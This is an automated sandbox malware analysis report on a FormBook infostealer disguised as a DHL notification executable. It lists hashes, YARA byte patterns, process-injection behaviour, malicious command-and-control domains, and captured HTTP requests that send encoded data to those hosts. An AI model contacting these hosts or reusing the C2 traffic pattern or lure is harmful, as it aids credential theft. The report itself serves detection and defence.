Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_Notification_pdf.exe

Overview

General Information

Sample Name:DHL_Notification_pdf.exe
Analysis ID:830435
MD5:06f7894017e8f6737d228adc14480c83
SHA1:fab1cbdbbb5fc2e76de2622948a02c3e8af17c18
SHA256:bbfb2aacf1ff431d0ed71b54c499d3a56b6bcc90d5137cd78097b40c354c2353
Tags:DHLexeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DHL_Notification_pdf.exe (PID: 5084 cmdline: C:\Users\user\Desktop\DHL_Notification_pdf.exe MD5: 06F7894017E8F6737D228ADC14480C83)
    • ldndbi.exe (PID: 3008 cmdline: "C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de MD5: C99B9B59B44F7789DD46E5230C22A9CD)
      • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ldndbi.exe (PID: 6108 cmdline: C:\Users\user~1\AppData\Local\Temp\ldndbi.exe MD5: C99B9B59B44F7789DD46E5230C22A9CD)
        • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmmon32.exe (PID: 5228 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1efd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18217:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18015:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ab1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18117:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1828f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d0c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dd87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ed3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1efd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18217:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.ldndbi.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.ldndbi.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x1ffc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1920a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.ldndbi.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19008:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18aa4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1910a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19282:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9ed:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17cff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ed7a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fd2d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.ldndbi.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.ldndbi.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20dc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc22:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a00a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.78.8.8.850513532023883 03/20/23-11:29:43.795616
          SID:2023883
          Source Port:50513
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: DHL_Notification_pdf.exeReversingLabs: Detection: 53%
          Source: DHL_Notification_pdf.exeVirustotal: Detection: 46%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.yongleproducts.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=qNzMMFnF92wYqbyAvira URL Cloud: Label: malware
          Source: http://www.traindic.top/hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZPAvira URL Cloud: Label: malware
          Source: http://www.adoptiveimmunotech.com/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.mindsetlighting.xyz/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.0dhy.xyz/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.amirah.cfd/hpb7/Avira URL Cloud: Label: phishing
          Source: http://www.amirah.cfdAvira URL Cloud: Label: phishing
          Source: http://www.traindic.top/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.admet01.clubAvira URL Cloud: Label: malware
          Source: http://www.0dhy.xyz/hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZPAvira URL Cloud: Label: malware
          Source: http://www.adoptiveimmunotech.com/hpb7/jAvira URL Cloud: Label: malware
          Source: http://www.traindic.topAvira URL Cloud: Label: malware
          Source: http://www.yongleproducts.com/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.admet01.club/hpb7/Avira URL Cloud: Label: malware
          Source: http://www.mindsetlighting.xyzAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: bohndigitaltech.comVirustotal: Detection: 5%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeReversingLabs: Detection: 18%
          Machine Learning detection for sample
          Source: DHL_Notification_pdf.exeJoe Sandbox ML: detected
          Source: 3.2.ldndbi.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.ldndbi.exe.5d0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL_Notification_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: DHL_Notification_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: ldndbi.exe, 00000001.00000003.250768478.000000001A020000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000001.00000003.250473705.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ldndbi.exe, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_004089F8 FindFirstFileExW,
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 4x nop then xor ebx, ebx

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 198.46.160.97 80
          Source: C:\Windows\explorer.exeDomain query: www.denko-kosan.com
          Source: C:\Windows\explorer.exeDomain query: www.traindic.top
          Source: C:\Windows\explorer.exeNetwork Connect: 1.13.186.125 80
          Source: C:\Windows\explorer.exeNetwork Connect: 219.94.129.181 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.231.77 80
          Source: C:\Windows\explorer.exeNetwork Connect: 67.222.24.48 80
          Source: C:\Windows\explorer.exeNetwork Connect: 49.212.180.95 80
          Source: C:\Windows\explorer.exeDomain query: www.bohndigitaltech.com
          Source: C:\Windows\explorer.exeDomain query: www.0dhy.xyz
          Source: C:\Windows\explorer.exeDomain query: www.yongleproducts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.110 80
          Source: C:\Windows\explorer.exeDomain query: www.rifleroofers.com
          Source: C:\Windows\explorer.exeDomain query: www.kunimi.org
          Source: C:\Windows\explorer.exeDomain query: www.amirah.cfd
          Source: C:\Windows\explorer.exeDomain query: www.bisarropainting.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50513 -> 8.8.8.8:53
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.0dhy.xyz
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: global trafficHTTP traffic detected: GET /hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIbedtv8fxp/SmPPkaBaUqgtGDC HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0h38HiNDm4XeyJxX5vlkTTrS1xP HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGK HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.46.160.97 198.46.160.97
          Source: Joe Sandbox ViewIP Address: 67.222.24.48 67.222.24.48
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 68 52 6d 6b 33 2d 62 70 38 4d 73 30 7a 41 28 4d 62 67 79 61 5a 5f 59 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIhRmk3-bp8Ms0zA(MbgyaZ_Y.
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.traindic.topConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.traindic.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.traindic.top/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 79 6f 39 32 4c 58 32 55 49 66 4d 47 50 4f 4b 31 66 4a 62 56 28 69 74 4d 28 38 56 68 59 34 6e 36 6c 32 30 54 41 4c 44 50 71 72 56 5f 71 4c 69 59 79 4d 34 70 4c 50 77 6a 68 58 6d 62 4a 54 5a 6e 30 33 33 53 7e 68 48 53 44 75 71 73 4b 48 77 41 51 79 6d 33 68 44 59 6b 5a 63 77 6b 61 61 6c 4e 73 61 66 51 51 66 4e 36 46 73 6c 68 46 6e 76 78 36 30 6d 5f 53 66 75 2d 77 43 4d 67 56 46 66 75 61 59 72 78 64 6b 71 55 38 67 56 70 78 6f 75 4d 30 38 6f 4e 7e 53 50 68 6f 4d 56 75 35 66 50 46 49 49 58 6f 42 58 5a 7a 69 2d 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=WRFlhw3KAgb5yo92LX2UIfMGPOK1fJbV(itM(8VhY4n6l20TALDPqrV_qLiYyM4pLPwjhXmbJTZn033S~hHSDuqsKHwAQym3hDYkZcwkaalNsafQQfN6FslhFnvx60m_Sfu-wCMgVFfuaYrxdkqU8gVpxouM08oN~SPhoMVu5fPFIIXoBXZzi-M.
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.bohndigitaltech.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.bohndigitaltech.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bohndigitaltech.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 52 4d 7e 6c 75 5a 74 42 55 30 74 5a 45 4d 79 6d 4b 4f 30 68 77 51 53 57 31 66 6e 63 56 41 72 65 61 2d 32 78 6e 39 28 66 37 4e 59 68 6e 47 37 45 4c 4a 6a 42 65 53 72 39 41 33 6a 4d 51 54 7a 53 5a 59 4b 4b 6f 56 73 69 32 79 57 54 4c 45 59 72 66 67 64 70 62 63 48 50 79 44 72 4c 61 43 73 30 64 6b 28 51 4a 6c 47 55 28 34 49 64 5a 37 67 30 76 66 6e 76 67 59 5a 44 33 39 51 35 43 46 6b 50 44 79 31 6f 50 57 39 37 4d 5f 38 73 34 4c 33 37 4c 53 50 43 56 53 38 77 58 5a 28 5f 4b 69 41 4b 75 32 46 6c 64 39 62 79 62 61 77 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=zSsGdga9al9lRM~luZtBU0tZEMymKO0hwQSW1fncVArea-2xn9(f7NYhnG7ELJjBeSr9A3jMQTzSZYKKoVsi2yWTLEYrfgdpbcHPyDrLaCs0dk(QJlGU(4IdZ7g0vfnvgYZD39Q5CFkPDy1oPW97M_8s4L37LSPCVS8wXZ(_KiAKu2Fld9bybaw.
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 69 76 6b 49 41 2d 33 38 77 78 69 30 63 45 6e 79 76 46 52 4e 34 4c 4e 78 4e 31 70 6c 34 48 4c 5a 62 32 6f 33 73 6f 4f 43 4b 62 66 65 4b 59 38 35 68 6a 4f 70 5a 47 45 5a 66 4a 49 58 44 34 36 44 34 4f 47 59 4f 54 7e 52 72 45 31 6e 73 53 68 48 38 32 75 42 72 6d 58 4c 34 64 48 49 30 42 39 56 61 64 72 77 4f 54 6c 57 52 46 62 65 79 34 63 64 61 69 30 6b 54 4b 6c 44 63 54 4f 6f 42 5f 66 4b 44 67 6c 45 28 38 6f 65 37 4b 64 52 7e 73 79 71 42 78 52 65 6c 30 43 58 66 75 4a 63 51 5f 43 72 7a 77 35 45 70 77 32 48 7e 37 30 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=fpdggjRt1rKnivkIA-38wxi0cEnyvFRN4LNxN1pl4HLZb2o3soOCKbfeKY85hjOpZGEZfJIXD46D4OGYOT~RrE1nsShH82uBrmXL4dHI0B9VadrwOTlWRFbey4cdai0kTKlDcTOoB_fKDglE(8oe7KdR~syqBxRel0CXfuJcQ_Crzw5Epw2H~70.
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 28 6d 4b 38 51 6b 52 4c 77 5f 6d 75 78 44 30 48 70 49 69 73 48 30 72 70 72 66 41 54 6b 6d 6c 6e 42 4b 68 67 79 37 65 6e 75 78 58 59 79 35 45 30 45 70 7e 58 51 6d 72 72 5a 4d 55 6e 75 76 37 33 51 69 6b 57 37 36 4c 46 59 74 71 34 32 6e 59 43 63 70 69 6c 54 39 6d 62 4e 32 54 39 4e 65 66 32 7a 68 6d 72 36 7a 4d 33 68 53 34 62 58 4c 76 6b 71 39 6d 6a 6a 67 54 33 70 45 47 69 44 34 6b 2d 51 2d 53 77 76 78 73 78 28 71 63 36 6d 42 42 61 36 51 6a 46 56 2d 46 66 46 52 71 72 66 4d 66 43 58 73 45 64 36 61 4c 43 47 70 45 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=AsvgeLDfpdKZ(mK8QkRLw_muxD0HpIisH0rprfATkmlnBKhgy7enuxXYy5E0Ep~XQmrrZMUnuv73QikW76LFYtq42nYCcpilT9mbN2T9Nef2zhmr6zM3hS4bXLvkq9mjjgT3pEGiD4k-Q-Swvxsx(qc6mBBa6QjFV-FfFRqrfMfCXsEd6aLCGpE.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:29:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gzipData Raw: 64 64 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 6b 93 6c 49 92 18 86 7d e7 af 38 b8 57 57 7d ab 27 33 6f be 2b ab 6a fb 72 67 67 a7 77 07 b3 f3 d8 9d dd 25 16 83 b6 6b 27 33 4f 56 65 df cc 3c 39 99 27 6f dd ea 62 c1 76 66 00 89 6b 00 0c 1f 24 f1 21 92 92 91 84 48 89 12 48 98 81 14 65 30 98 c9 4c 3f 85 4d 88 c0 27 fd 05 c5 fb 78 44 78 bc ce c9 ba 33 80 71 7b a7 bb f2 84 87 87 87 87 47 84 bb 87 87 c7 ef fc b5 65 b9 a8 1e f6 45 76 57 6d 37 6f 7f 87 fe 3b db e4 bb db 2f 5e 7c 9d bf 20 bf 8b 7c f9 f6 77 b6 45 95 67 8b bb fc 70 2c aa 2f 5e 9c aa 55 77 f6 42 7c dd e5 db e2 8b 17 1f d6 c5 fd be 3c 54 2f b2 45 b9 ab 8a 1d 81 ba 5f 2f ab bb 2f 96 c5 87 f5 a2 e8 b2 1f 9d 6c bd 5b 57 eb 7c d3 3d 2e f2 4d f1 c5 a0 d7 ef 64 b2 66 77 b5 ae be 58 94 1f 8a 83 8e f9 50 ac 8a c3 81 7c ad 31 ef ca ae fc da bd bf 2b 76 dd 65 79 bf bb 3d e4 cb 42 af ba 2a 0f db bc ea 2e 8b aa 58 54 eb 72 07 50 54 c5 a6 d8 df 95 bb e2 8b 5d 49 2a 1d 17 87 f5 be ca f2 e3 c3 6e 91 1d 0f 8b 2f 5e dc 55 d5 fe 78 fd e6 cd fd fd 7d ef b6 2c 6f 37 04 ed ed 36 df e5 b7 c5 a1 b7 28 b7 6f 6e c9 ef 37 5f 1f ff ed f5 f2 8b 3f fb 6e 